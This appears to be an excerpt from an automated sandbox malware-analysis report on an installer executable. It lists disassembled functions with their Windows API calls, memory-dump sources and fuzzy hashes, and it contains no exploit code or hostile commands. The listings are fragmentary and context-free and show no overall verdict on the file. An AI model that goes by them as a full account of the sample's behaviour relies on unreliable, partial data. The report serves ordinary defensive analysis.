                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                        • Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
                                                                                        • Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                        • Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405C49 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DDA,?,?), ref: 00405C7A
                                                                                        • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C83
                                                                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                        • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405CA0
                                                                                        • wsprintfA.USER32 ref: 00405CBE
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,?,00421E98,?,?,?,?,?), ref: 00405CF9
                                                                                        • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405D08
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
                                                                                        • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405DA7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DAE
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                        • String ID: %s=%s$[Rename]
                                                                                        • API String ID: 2171350718-1727408572
                                                                                        • Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                        • Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
                                                                                        • Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                        • Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406244 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040629C
                                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004062A9
                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062AE
                                                                                        • CharPrevA.USER32(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062BE
                                                                                        Strings
                                                                                        • *?|<>/":, xrefs: 0040628C
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00406280
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-2995378841
                                                                                        • Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                        • Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
                                                                                        • Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                        • Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004040CF Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040EC
                                                                                        • GetSysColor.USER32(00000000), ref: 0040412A
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404136
                                                                                        • SetBkMode.GDI32(?,?), ref: 00404142
                                                                                        • GetSysColor.USER32(?), ref: 00404155
                                                                                        • SetBkColor.GDI32(?,?), ref: 00404165
                                                                                        • DeleteObject.GDI32(?), ref: 0040417F
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404189
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                        • Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
                                                                                        • Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                        • Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE924D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6FE91215: GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE925DE
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE92618
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: 29db057164d7b70d4b93398e7069bd715fcd77c750b1c45c2bf3f94f0eb0a635
                                                                                        • Instruction ID: 35d8517f0394bdedbca571751161a82440219b189489d94f34908b4e866b7e78
                                                                                        • Opcode Fuzzy Hash: 29db057164d7b70d4b93398e7069bd715fcd77c750b1c45c2bf3f94f0eb0a635
                                                                                        • Instruction Fuzzy Hash: 29419DB2148600EFCB01CFA4CD98C2A7FBEEB97314B20456EF51586250D736A915DB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004049BB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049D6
                                                                                        • GetMessagePos.USER32 ref: 004049DE
                                                                                        • ScreenToClient.USER32(?,?), ref: 004049F8
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A0A
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                        • Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
                                                                                        • Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                        • Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401DFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401E02
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                                        • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                        • String ID: Calibri
                                                                                        • API String ID: 3808545654-1409258342
                                                                                        • Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                        • Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
                                                                                        • Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                        • Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                                        • MulDiv.KERNEL32(00135201,?,00136C20), ref: 00402D23
                                                                                        • wsprintfA.USER32 ref: 00402D33
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 00402D2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                        • Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
                                                                                        • Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                        • Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE922F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE92447
                                                                                          • Part of subcall function 6FE91224: lstrcpynA.KERNEL32(00000000,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE91234
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FE923C2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FE923D7
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FE923E8
                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6FE923F6
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE923FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                        • String ID:
                                                                                        • API String ID: 3730416702-0
                                                                                        • Opcode ID: 0a0edeee5f42947e8b7a7f4bc894caf67546c4dedbb2d1651709b925489a9552
                                                                                        • Instruction ID: 8606e4d46b547c1ad056f9e4910bf5e1a44054db64fe312b6f20de0601a82a55
                                                                                        • Opcode Fuzzy Hash: 0a0edeee5f42947e8b7a7f4bc894caf67546c4dedbb2d1651709b925489a9552
                                                                                        • Instruction Fuzzy Hash: F441BDB1908301EFDB10DF649944B6ABFE9FF52325F208A6EE459CA280D730A545CB72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004027D3 Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 004027F7
                                                                                        • CloseHandle.KERNEL32(?), ref: 00402877
                                                                                          • Part of subcall function 004031ED: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                                                        • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402813
                                                                                        • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                                          • Part of subcall function 00402FFB: GetTickCount.KERNEL32 ref: 00403059
                                                                                          • Part of subcall function 00402FFB: GetTickCount.KERNEL32 ref: 004030DA
                                                                                          • Part of subcall function 00402FFB: MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00403107
                                                                                          • Part of subcall function 00402FFB: wsprintfA.USER32 ref: 00403117
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040288B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2082585436-0
                                                                                        • Opcode ID: 6686f05f3e5ec83b6cca2b9f62aa3083e219101479c7e8b0ab6b46277f5706d6
                                                                                        • Instruction ID: e2ea0a92745ef5ca30714559c2a0b3d33caec716b30018bf1858ba20d9c2dcb2
                                                                                        • Opcode Fuzzy Hash: 6686f05f3e5ec83b6cca2b9f62aa3083e219101479c7e8b0ab6b46277f5706d6
                                                                                        • Instruction Fuzzy Hash: 44216A72C00128BBCF116FA5CD48CAE7F79EF09364B10823AF524762E0C67959419BA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004048B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                        • wsprintfA.USER32 ref: 00404957
                                                                                        • SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$Trochidae Setup: Installing
                                                                                        • API String ID: 3540041739-3189352601
                                                                                        • Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                        • Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
                                                                                        • Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                        • Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

